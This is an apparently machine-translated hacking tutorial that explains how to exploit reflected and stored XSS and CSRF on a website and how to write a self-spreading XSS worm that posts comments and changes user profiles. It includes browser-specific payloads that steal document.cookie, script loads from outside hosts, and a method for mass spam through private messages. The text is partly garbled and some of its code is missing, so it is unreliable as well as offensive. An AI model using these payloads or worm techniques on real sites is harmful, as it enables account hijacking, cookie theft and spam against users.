Comments on how to package website vulnerabilities + teach you how to write xss worms

This article analyzes some of the vulnerabilities on the main site, provides scenarios for exploiting various vulnerabilities, and finally teaches you how to write simple xss worms to comment on websites that still have cross-site problems, including: storage, the reflected xss and httponly are not set. The csrf has no defense. 1. First, let's take a few reflective xss instances. This is less harmful to General websites, but the comments are basically not protected against cross-site attacks, in addition, private messages can be sent in batches. The reflected xss uses Google's short-chain conversion to cause great harm, including stealing cookies, modifying user information, leaving backdoors, and making comments at will, for specific usage, refer to the subsequent worm script reflection type. Firefox directly uses "/> <script> alert (/1 /) </script> you can use the 0day "id => <div/id = x> x </div> <xml: namespace prefix = t> <import namespace = t implementation = % 23 default % 23time2> <t: set/attributename = inner HTML targetElement = x to = % 26lt; img % 26% 2311; src = x: x % 26% 2311; onerror % 26%; = alert % 2311 23x28; document. cookie % 26% 23x29; % 26gt;> chrome uses "> <svg> <script xlink: href = // *********> </script> there are still many reflection types, and tools can scan a bunch, not to mention dom, let's just give a few examples. 2. For how to send private messages in batches, you can view the post interface. Here, you only need to use burp or write a script to parameterize targetName. The value is the user name, which can be obtained in batches and used permanently, then, you can use this interface to send small ads and malicious links in batches. For example, "This food store is good. Please check the connection ". 3. When it comes to private messages, I will not talk about the usage of a csrf stored in the private message to obtain cookies. On the surface, the private message content is filtered, but the input name is not filtered, however, the storage xss cannot be formed. However, you can use csrf to construct the post reflection type. The following csrf script is displayed in the pop-up box. It is a good choice to put your own shell website, for example,
Check whether there are automatic comments. Compared with this function, it is highly risky for reviews, it's a trivial matter to refresh others. 5. If we talk about reflection, let's talk about the storage type of x itself. For example, the worm will also mention that this area filters out <script>, but it does not filter <frame>. I don't know if js development is relatively poor. I should filter '"<> like in other places. 6. Then I will talk about the blind hitting problem. Let's just look at the figure.
The following focuses on worms, which are the parking information for comments. First of all, you should know that even if csrf, including referer and token, is prevented, the referer is invalid because it is the js that calls the website, and the token can generally be read through js, for details, refer to the example of the Sina worm. I didn't write this code because I didn't have a token. Let's take a look at the results. Because I did not dare to test it, I first wrote the xss worm as csrf. The Code is as follows: I called the xss written by sogili. js
Since I used the csrf test just now, I used the x. najax pseudo ajax method. The csrf tried it without ajax. It is estimated that cross-origin requests are restricted, and each website has different settings. X. The advantage of najax is that the station can be used outside the station, you can take a good look at http://mmme.me/xss.jswill be white 3 click Next to see the detailed code, I will not post, call js address is http://xsser.me/zJ5sSA? 1358 *. Since I didn't directly use the parking information of the worm address in the script, we can also test whether the worm code is successfully written. 4. js call successful. 5. Check whether the request is executed.

We can see a few more results, and we can find worms. The personal information page has been changed, so we will introduce the use of worms here. The example is very simple. It is good for the vendor to automatically block reviews, but some comments without worms will not be automatically blocked. Sometimes not all worms with malicious comments will be blocked. Solution:

I think it is a serious one-to-one solution.